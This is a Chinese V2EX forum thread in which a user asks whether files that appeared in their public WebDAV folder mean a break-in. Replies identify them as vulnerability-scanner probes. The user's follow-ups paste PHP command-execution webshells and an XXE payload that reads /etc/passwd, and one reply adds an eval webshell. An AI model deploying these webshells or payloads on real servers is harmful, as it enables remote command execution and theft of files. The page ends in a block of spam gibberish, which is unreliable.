[求助] 有无安全大佬,电脑突然出现奇怪的文件,里面显示一些 CVE-XXX 的信息,不知道是黑客入侵还是被扫洞程序扫到了 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
请不要在回答技术问题时复制粘贴 AI 生成的内容
movq
V2EX    程序员

[求助] 有无安全大佬,电脑突然出现奇怪的文件,里面显示一些 CVE-XXX 的信息,不知道是黑客入侵还是被扫洞程序扫到了

  •  
  •   movq 2023-05-10 20:05:40 +08:00 3191 次点击
    这是一个创建于 885 天前的主题,其中的信息可能已经有所发展或是发生改变。

    我是使用了一个 webdav 程序,把我电脑 A 的某个文件夹 F 暴露挂载成了 webdav ,然后使用 http 方式,在另一台电脑 B 通过公网 IP 来访问

    昨天 F 文件夹里面里面突然出现下列文件夹:

    gHbz8tWnPvmTEVo

    打开之后,里面没发现有什么恶意程序,但是有很多网页,jsp 或者 php ,用文本编辑器打开里面就显示 CVExxx

    zMgVQJuK6esNL9o

    里面有个文件叫 nuclei.html.gif ,我去 github 搜索,发现是一个 projectdiscovery 的 repo 里面的代码

    HUSGPu6XoFtR1C5

    8qcYLBrAutgPFHk

    https://github.com/projectdiscovery/nuclei-templates

    Community curated list of templates for the nuclei engine to find security vulnerabilities.

    Nuclei is a fast, efficient, and extensible vulnerability scanner. It can scan thousands of hosts in just a few minutes. The nuclei engine uses text-file templates to define the steps required to detect a vulnerability.

    目前的怀疑:

    1. 某些扫洞程序扫到我的 webdav 了(但问题是 1 、他们是怎么做到在我的 webdav 文件夹添加文件的呢? 2 、在我的 webdav 文件夹放下这些文件的意义是什么呢)
    2. 有黑客入侵了电脑,但问题是我也没发现有什么勒索软件或者文件丢失啊?

    我的疑问:

    1. 如何确定自己的电脑有没有被入侵?
    2. 如果是被扫洞程序扫到了,这意味着是别人提醒我有漏洞,还是意味着什么呢?
    3. 大家觉得发生了什么?
    第 1 条附言    2023-05-10 20:36:45 +08:00

    以下是所有的文件里面的内容:主要是PHP JSP文件

    里面大部分内容都是在echo,提示有CVE漏洞。

    我看比较严重的代码主要是和cmd相关的。这个应该意思是可以调用系统的终端然后执行某些程序?应该是如果这些php文件没有被执行就无大碍吧?

    PHP文件

    <?php echo md5('CVE-2022-25487');?> <% out.println("CVE-2022-26352"); %> <?php echo md5('phpcollab_rce');?> POC_TEST <?php $cmd=$_GET['cmd']; system($cmd); ?> <?php echo exec($_GET["cmd"]); ?> <?php echo md5('CVE-2022-1952');?> <?php echo "File Upload success"; <?php echo 'CVE-2021-24236'; ?> 

    JSP文件

    <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> <% String cve = "CVE-2018-15961"; MessageDigest alg = MessageDigest.getInstance("MD5"); alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); String hx; for (int i=0;i<digest.length;i++){ hx = Integer.toHexString(0xFF & digest[i]); if(hx.length() == 1){hx = "0" + hx;} hashedpasswd.append(hx); } out.println(hashedpasswd.toString()); %> 
    <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> <% String cve = "CVE-2018-2894"; MessageDigest alg = MessageDigest.getInstance("MD5"); alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); String hx; for (int i=0;i<digest.length;i++){ hx = Integer.toHexString(0xFF & digest[i]); //0x03 is equal to 0x3, but we need 0x03 for our md5sum if(hx.length() == 1){hx = "0" + hx;} hashedpasswd.append(hx); } out.println(hashedpasswd.toString()); %> 
    第 2 条附言    2023-05-10 20:37:08 +08:00

    接着第一条附言没贴完的代码(字数限制)

    XML文件

    <?xml version='1.0' encoding='UTF-8'?> <ChartData> <Categories> <Category>ALttP</Category> </Categories> <Series label="2PXwFeEsfjzIPlN8BfkLn1ATkhX"> <Point> <Value type="y">12345</Value> </Point> </Series> </ChartData> 
    <?xml version='1.0' encoding='UTF-8'?> <!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]> <SAPChartCustomizing version="1.1"> <Elements> <ChartElements> <Title> <Extension>&xxe;</Extension> </Title> </ChartElements> </Elemens> </SAPChartCustomizing> 

    文本文件

    MyPasswdNewData->/api/tomcat POC_TEST CVE-2020-12800-2PXwFlCcbD1a74LOgwnlRWVnJzD 
    21 条回复    2023-05-11 17:27:24 +08:00
    INTEL2333
        1
    INTEL2333  
       2023-05-10 20:10:59 +08:00
    unknowsll
        2
    unknowsll  
       2023-05-10 20:12:12 +08:00   1
    你放公网的东西被扫到了,加一下验证吧,上面有一条最简单的 php 小马,如果成了,后续会有大马继续进来,请尽快处理此服务,或者限制来源 IP
    <?php eval(@$_POST['a']); ?>
    unknowsll
        3
    unknowsll  
       2023-05-10 20:14:59 +08:00
    MD5 注入可以了解一下。
    movq
        4
    movq  
    OP
       2023-05-10 20:16:35 +08:00
    billlee
        5
    billlee  
       2023-05-10 20:18:44 +08:00 via Android
    你的 webdav 被扫到并且被破解了密码(或者你根本没设置密码),然后那个人上传了一个 php 后门。当然如果你这个 webdav 服务是纯粹的 webdav, 不包含 php 解释器,那这个后门是无法运行的。
    movq
        6
    movq  
    OP
       2023-05-0 20:26:10 +08:00
    @billlee 我是 mac 直接使用 appstore 下载的一个 app ,这个 app 提供了 webdav 功能。不太知道这个 app 本身有没有 php 解释器
    dode
        7
    dode  
       2023-05-10 20:29:07 +08:00
    这可能类似善良黑客给你提示,管理员需要尽快处理
    jackyzy823
        8
    jackyzy823  
       2023-05-10 20:30:04 +08:00 via Android
    被扫描了,Webdav PUT 方法不就会创建文件么…
    SunsetShimmer
        9
    SunsetShimmer  
       2023-05-10 20:37:08 +08:00
    被上传 PHP 后门,如果没有 PHP 环境,没用。

    但不管怎么说把存储公开到公网都不太好...
    movq
        10
    movq  
    OP
       2023-05-10 20:37:48 +08:00
    @SunsetShimmer 意思是如果没有程序主动执行我 webdav 里面的 php 文件就没事吗?
    movq
        11
    movq  
    OP
       2023-05-10 20:50:32 +08:00
    @billlee
    @SunsetShimmer 我不太懂 php ,但是我知道 tomcat 里面是直接上传文件到 webapp 就会被自动运行。你们的意思是如果 php 文件被自动上传到某个目录,也会和 tomcat 运行 java web 程序一样被自动运行,这个意思吗?

    但我这里面这些 php 文件都是在我的 webdav 根目录。我 webdav 只用于存储文件,没有配置什么服务,应该就没问题了吧?
    billlee
        12
    billlee  
       2023-05-10 20:59:21 +08:00
    是的,要有程序去执行它。php 和 jsp 是 apache/tomcat 在收到 web 请求的时候会自动执行 web 目录下的对应脚本。如果是纯粹的 http 静态文件服务器,那是无法执行的。专门的 webdav app 大概率是没有 php 解释器的。
    patrickyoung
        13
    patrickyoung  
       2023-05-10 21:22:46 +08:00 via iPhone
    @movq #11 依然有问题,如果服务器在国内的或者被用来在国内的人身上的话,你想想攻击者在你这传个菠菜 /黄赌毒然后引用一下这个资源,你会怎么样?
    darknoll
        14
    darknoll  
       2023-05-11 10:37:09 +08:00
    你 webdav 没有设置密码?
    xiaopigfly
        15
    xiaopigfly  
       2023-05-11 11:37:45 +08:00
    先赶紧把公网停掉,再排查是否解析 php 文件。如果解析大概率被入侵了。
    movq
        16
    movq  
    OP
       2023-05-11 14:34:51 +08:00
    @darknoll 有密码, 但网上查了下有的 webdav 攻击方式不需要密码
    yumusb
        17
    yumusb  
       2023-05-11 14:40:59 +08:00
    可以直接 尝试 PUT 文件到你的服务器,看看是否能够成功上传。
    cquan
        18
    cquan  
       2023-05-11 15:02:28 +08:00
    CVE+数字是漏洞编号,你这个项目有漏洞,它应该是用软件批量扫描的,赶紧修复吧
    movq
        19
    movq  
    OP
       2023-05-11 15:06:02 +08:00
    @yumusb 感觉是 webdav 的 app 内部有漏洞,这些漏洞可以直接免密码上传文件进行攻击
    movq
        20
    movq  
    OP
       2023-05-11 15:07:16 +08:00
    @cquan 就是不知道是黑客来攻击我的电脑,还是有白帽子专门扫洞提醒别人,感觉很奇怪。我看了下文件夹,没有被修改过(因为 last modified time 都比这些扫洞文件的创建时间早)
    kir4
        21
    kir4  
       2023-05-11 17:27:24 +08:00
    基本可以确定是扫描器行为
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     1169 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 37ms UTC 17:33 PVG 01:33 LAX 10:33 JFK 13:33
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86